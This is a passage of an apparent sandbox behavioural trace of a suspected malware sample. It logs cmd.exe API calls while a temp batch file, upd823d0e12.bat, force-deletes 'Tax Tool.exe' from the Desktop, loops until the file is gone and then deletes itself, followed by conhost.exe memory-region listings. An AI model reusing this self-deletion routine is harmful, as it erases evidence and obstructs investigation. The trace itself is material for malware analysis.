(_FileHandle=3) returned 0xb4 [0080.924] SetFilePointer (in: hFile=0xb4, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0080.924] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.924] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0080.924] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.924] ReadFile (in: hFile=0xb4, lpBuffer=0x9fa960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f4e4, lpOverlapped=0x0 | out: lpBuffer=0x9fa960*, lpNumberOfBytesRead=0x26f4e4*=0xc1, lpOverlapped=0x0) returned 1 [0080.924] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0080.925] SetFilePointer (in: hFile=0xb4, lDistanceToMove=77, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d [0080.925] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x9fa960, cbMultiByte=62, lpWideCharStr=0x9e57e0, cchWideChar=8191 | out: lpWideCharStr="del /F /Q \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\"\r\n") returned 62 [0080.927] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.927] GetFileType (hFile=0xb4) returned 0x1 [0080.927] _get_osfhandle (_FileHandle=3) returned 0xb4 [0080.927] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4d [0080.928] _wcsicmp (_String1="del", _String2=")") returned 59 [0080.928] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0080.928] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0080.928] _wcsicmp (_String1="IF", _String2="del") returned 5 [0080.929] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0080.929] _wcsicmp (_String1="REM", _String2="del") returned 14 [0080.929] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0080.933] _tell (_FileHandle=3) returned 77 [0080.933] _close (_FileHandle=3) returned 0 [0080.933] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0080.933] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0080.933] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0080.933] GetConsoleTitleW (in: lpConsoleTitle=0x26f0c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0080.942] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0080.942] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0080.942] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0080.945] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26ee70 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.946] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26dee0 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.946] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e114, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e118, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e114*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0080.946] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0080.947] _wcsicmp (_String1="Tax Tool.exe", _String2=".") returned 70 [0080.947] _wcsicmp (_String1="Tax Tool.exe", _String2="..") returned 70 [0080.947] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe") returned 0x20 [0080.948] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3388a8 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0080.948] SetErrorMode (uMode=0x0) returned 0x0 [0080.948] SetErrorMode (uMode=0x1) returned 0x0 [0080.948] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", nBufferLength=0x104, lpBuffer=0x26e540, lpFilePart=0x26e514 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", lpFilePart=0x26e514*="Tax Tool.exe") returned 0x30 [0080.948] SetErrorMode (uMode=0x0) returned 0x1 [0080.948] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x11 [0080.949] _wcsicmp (_String1="Tax Tool.exe", _String2=".") returned 70 [0080.949] _wcsicmp (_String1="Tax Tool.exe", _String2="..") returned 70 [0080.949] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe") returned 0x20 [0080.950] FindFirstFileExW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", fInfoLevelId=0x0, lpFindFileData=0x338dd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x338dd4) returned 0x3395d8 [0080.950] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0080.950] NtOpenFile (in: FileHandle=0x26e414, DesiredAccess=0x10000, ObjectAttributes=0x26e3dc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\desktop\\tax tool.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26e404, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x26e414*=0xb0, IoStatusBlock=0x26e404*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.951] RtlReleaseRelativeName () returned 0x26e3f4 [0080.951] RtlFreeAnsiString (AnsiString="\\") [0080.951] NtQueryVolumeInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x26e340, FsInformation=0x26e348, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x26e340, FsInformation=0x26e348) returned 0x0 [0080.952] CloseHandle (hObject=0xb0) returned 1 [0080.965] FindNextFileW (in: hFindFile=0x3395d8, lpFindFileData=0x338dd4 | out: lpFindFileData=0x338dd4) returned 0 [0080.967] GetLastError () returned 0x12 [0080.967] FindClose (in: hFindFile=0x3395d8 | out: hFindFile=0x3395d8) returned 1 [0080.977] _get_osfhandle (_FileHandle=1) returned 0x3c [0080.977] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0081.042] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.042] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0081.100] _get_osfhandle (_FileHandle=0) returned 0x38 [0081.101] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0081.117] SetConsoleInputExeNameW () returned 0x1 [0081.117] GetConsoleOutputCP () returned 0x1b5 [0081.142] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0081.142] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.152] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0081.152] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0081.153] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.153] SetFilePointer (in: hFile=0xb4, lDistanceToMove=77, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d [0081.153] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.153] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4d [0081.153] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.153] ReadFile (in: hFile=0xb4, lpBuffer=0x9fa960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f4e4, lpOverlapped=0x0 | out: lpBuffer=0x9fa960*, lpNumberOfBytesRead=0x26f4e4*=0x83, lpOverlapped=0x0) returned 1 [0081.154] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.154] SetFilePointer (in: hFile=0xb4, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.154] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x9fa960, cbMultiByte=68, lpWideCharStr=0x9e57e0, cchWideChar=8191 | out: lpWideCharStr="if exist \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" goto d\r\n") returned 68 [0081.156] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.156] GetFileType (hFile=0xb4) returned 0x1 [0081.157] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.157] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.158] _wcsicmp (_String1="if", _String2=")") returned 64 [0081.158] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0081.158] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0081.158] _wcsicmp (_String1="IF", _String2="if") returned 0 [0081.158] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0081.160] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0081.161] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0081.161] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0081.164] _wcsicmp (_String1="goto", _String2=")") returned 62 [0081.164] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0081.164] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0081.164] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0081.164] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0081.164] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0081.164] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0081.167] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0081.168] _tell (_FileHandle=3) returned 145 [0081.168] _close (_FileHandle=3) returned 0 [0081.168] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", nBufferLength=0x208, lpBuffer=0x26f0b0, lpFilePart=0x26ee58 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", lpFilePart=0x26ee58*="Tax Tool.exe") returned 0x30 [0081.169] wcsncmp (_String1="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0081.169] FindFirstFileExW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", fInfoLevelId=0x1, lpFindFileData=0x26ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ee60) returned 0xffffffff [0081.169] GetLastError () returned 0x2 [0081.169] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0081.169] GetLastError () returned 0x6 [0081.169] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.169] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0081.178] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.178] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0081.183] _get_osfhandle (_FileHandle=0) returned 0x38 [0081.183] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0081.198] SetConsoleInputExeNameW () returned 0x1 [0081.198] GetConsoleOutputCP () returned 0x1b5 [0081.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0081.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.215] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0081.216] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0081.216] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.216] SetFilePointer (in: hFile=0xb4, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.217] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.217] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.217] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.217] ReadFile (in: hFile=0xb4, lpBuffer=0x9fa960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f4e4, lpOverlapped=0x0 | out: lpBuffer=0x9fa960*, lpNumberOfBytesRead=0x26f4e4*=0x3f, lpOverlapped=0x0) returned 1 [0081.217] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.217] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x9fa960, cbMultiByte=63, lpWideCharStr=0x9e57e0, cchWideChar=8191 | out: lpWideCharStr="del /F \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"\r\no d\r\n") returned 63 [0081.219] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.219] GetFileType (hFile=0xb4) returned 0x1 [0081.219] _get_osfhandle (_FileHandle=3) returned 0xb4 [0081.219] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd0 [0081.220] _wcsicmp (_String1="del", _String2=")") returned 59 [0081.220] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0081.221] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0081.221] _wcsicmp (_String1="IF", _String2="del") returned 5 [0081.221] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0081.221] _wcsicmp (_String1="REM", _String2="del") returned 14 [0081.221] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0081.225] _tell (_FileHandle=3) returned 208 [0081.225] _close (_FileHandle=3) returned 0 [0081.226] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0081.226] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0081.226] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0081.226] GetConsoleTitleW (in: lpConsoleTitle=0x26f0c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.245] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0081.245] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0081.245] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0081.247] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26ee70 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0081.247] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x26dee0 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0081.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e114, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e118, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e114*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0081.248] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0081.248] _wcsicmp (_String1="upd823d0e12.bat", _String2=".") returned 71 [0081.248] _wcsicmp (_String1="upd823d0e12.bat", _String2="..") returned 71 [0081.248] GetFileAttributesW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 0x20 [0081.248] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32c3f0 | out: lpBuffer="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop") returned 0x23 [0081.248] SetErrorMode (uMode=0x0) returned 0x0 [0081.248] SetErrorMode (uMode=0x1) returned 0x0 [0081.248] GetFullPathNameW (in: lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", nBufferLength=0x104, lpBuffer=0x26e540, lpFilePart=0x26e514 | out: lpBuffer="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", lpFilePart=0x26e514*="upd823d0e12.bat") returned 0x34 [0081.248] SetErrorMode (uMode=0x0) returned 0x1 [0081.248] GetFileAttributesW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp") returned 0x10 [0081.249] _wcsicmp (_String1="upd823d0e12.bat", _String2=".") returned 71 [0081.249] _wcsicmp (_String1="upd823d0e12.bat", _String2="..") returned 71 [0081.249] GetFileAttributesW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 0x20 [0081.249] FindFirstFileExW (in: lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", fInfoLevelId=0x0, lpFindFileData=0x32c92c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32c92c) returned 0x32d130 [0081.250] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0081.250] NtOpenFile (in: FileHandle=0x26e414, DesiredAccess=0x10000, ObjectAttributes=0x26e3dc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26e404, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x26e414*=0xb0, IoStatusBlock=0x26e404*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.250] RtlReleaseRelativeName () returned 0x26e3f4 [0081.250] RtlFreeAnsiString (AnsiString="\\") [0081.250] NtQueryVolumeInformationFile (in: FileHandle=0xb0, IoStatusBlock=0x26e340, FsInformation=0x26e348, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x26e340, FsInformation=0x26e348) returned 0x0 [0081.250] CloseHandle (hObject=0xb0) returned 1 [0081.252] FindNextFileW (in: hFindFile=0x32d130, lpFindFileData=0x32c92c | out: lpFindFileData=0x32c92c) returned 0 [0081.253] GetLastError () returned 0x12 [0081.253] FindClose (in: hFindFile=0x32d130 | out: hFindFile=0x32d130) returned 1 [0081.254] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.254] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0081.264] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.264] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0081.276] _get_osfhandle (_FileHandle=0) returned 0x38 [0081.276] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0081.297] SetConsoleInputExeNameW () returned 0x1 [0081.297] GetConsoleOutputCP () returned 0x1b5 [0081.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0081.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.338] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.339] GetLastError () returned 0x2 [0081.339] _get_osfhandle (_FileHandle=2) returned 0x40 [0081.339] GetFileType (hFile=0x40) returned 0x2 [0081.339] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0081.339] RtlAcquireSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.339] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f4ac | out: lpMode=0x26f4ac) returned 1 [0081.357] RtlReleaseSRWLockShared (in: SRWLock=0xa00c20 | out: SRWLock=0xa00c20) [0081.357] _get_osfhandle (_FileHandle=2) returned 0x40 [0081.357] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x40, lpConsoleScreenBufferInfo=0x26f4fc | out: lpConsoleScreenBufferInfo=0x26f4fc) returned 1 [0081.368] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x9f6940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0081.379] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x9f6940, nSize=0x2000, Arguments=0x26f52c | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0081.379] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x9f6940*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x26f4e0, lpReserved=0x0 | out: lpBuffer=0x9f6940*, lpNumberOfCharsWritten=0x26f4e0*=0x21) returned 1 [0081.420] CmdBatNotificationStub () returned 0x1 [0081.420] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.420] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0081.427] _get_osfhandle (_FileHandle=1) returned 0x3c [0081.427] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9ee40c | out: lpMode=0x9ee40c) returned 1 [0081.436] _get_osfhandle (_FileHandle=0) returned 0x38 [0081.436] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x9ee408 | out: lpMode=0x9ee408) returned 1 [0081.457] SetConsoleInputExeNameW () returned 0x1 [0081.457] GetConsoleOutputCP () returned 0x1b5 [0081.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9ee460 | out: lpCPInfo=0x9ee460) returned 1 [0081.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.642] exit (_Code=1) Thread: id = 16 os_tid = 0xd00 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x48f91000" os_pid = "0xcbc" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xcac" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" Region: id = 449 start_va = 0x7f202000 end_va = 0x7f202fff entry_point = 0x0 region_type = private name = "private_0x000000007f202000" filename = "" Region: id = 450 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 451 start_va = 0x5d4d620000 end_va = 0x5d4d63ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4d620000" filename = "" Region: id = 452 start_va = 0x5d4d640000 end_va = 0x5d4d653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4d640000" filename = "" Region: id = 453 start_va = 0x5d4d660000 end_va = 0x5d4d69ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4d660000" filename = "" Region: id = 454 start_va = 0x7df5ff800000 end_va = 0x7ff5ff7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff800000" filename = "" Region: id = 455 start_va = 0x7ff768c30000 end_va = 0x7ff768c52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff768c30000" filename = "" Region: id = 456 start_va = 0x7ff768c5d000 end_va = 0x7ff768c5efff entry_point = 0x0 region_type = private name = "private_0x00007ff768c5d000" filename = "" Region: id = 457 start_va = 0x7ff768c5f000 end_va = 0x7ff768c5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff768c5f000" filename = "" Region: id = 458 start_va = 0x7ff769c30000 end_va = 0x7ff769c40fff entry_point = 0x7ff769c31930 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" Region: id = 459 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 460 start_va = 0x5d4d800000 end_va = 0x5d4d8fffff entry_point = 0x0 region_type = private name = "private_0x0000005d4d800000" filename = "" Region: id = 461 start_va = 0x7ffd2c450000 end_va = 0x7ffd2c62cfff entry_point = 0x7ffd2c45ba70 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 462 start_va = 0x7ffd2e580000 end_va = 0x7ffd2e62cfff entry_point = 0x7ffd2e592e30 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 463 start_va = 0x5d4d620000 end_va = 0x5d4d62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4d620000" filename = "" Region: id = 464 start_va = 0x5d4d6a0000 end_va = 0x5d4d75dfff entry_point = 0x5d4d6a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 465 start_va = 0x5d4d760000 end_va = 0x5d4d79ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4d760000" filename = "" Region: id = 466 start_va = 0x7ff768b30000 end_va = 0x7ff768c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff768b30000" filename = "" Region: id = 467 start_va = 0x7ff768c5b000 end_va = 0x7ff768c5cfff entry_point = 0x0 region_type = private name = "private_0x00007ff768c5b000" filename = "" Region: id = 468 start_va = 0x7ffd2e8c0000 end_va = 0x7ffd2e95cfff entry_point = 0x7ffd2e8c78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 469 start_va = 0x5d4d630000 end_va = 0x5d4d636fff entry_point = 0x0 region_type = private name = "private_0x0000005d4d630000" filename = "" Region: id = 470 start_va = 0x5d4d7a0000 end_va = 0x5d4d7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4d7a0000" filename = "" Region: id = 471 start_va = 0x5d4d7b0000 end_va = 0x5d4d7b6fff entry_point = 0x0 region_type = private name = "private_0x0000005d4d7b0000" filename = "" Region: id = 472 start_va = 0x5d4da90000 end_va = 0x5d4da9ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4da90000" filename = "" Region: id = 473 start_va = 0x7ffd188b0000 end_va = 0x7ffd18902fff entry_point = 0x7ffd188bda40 region_type = mapped_file name = "ConhostV2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" Region: id = 474 start_va = 0x7ffd284b0000 end_va = 0x7ffd28632fff entry_point = 0x7ffd284fc1d0 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 475 start_va = 0x7ffd2c6e0000 end_va = 0x7ffd2c805fff entry_point = 0x7ffd2c74e290 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 476 start_va = 0x7ffd2c810000 end_va = 0x7ffd2c950fff entry_point = 0x7ffd2c834e60 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 477 start_va = 0x7ffd2c960000 end_va = 0x7ffd2cae4fff entry_point = 0x7ffd2c9ad030 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 478 start_va = 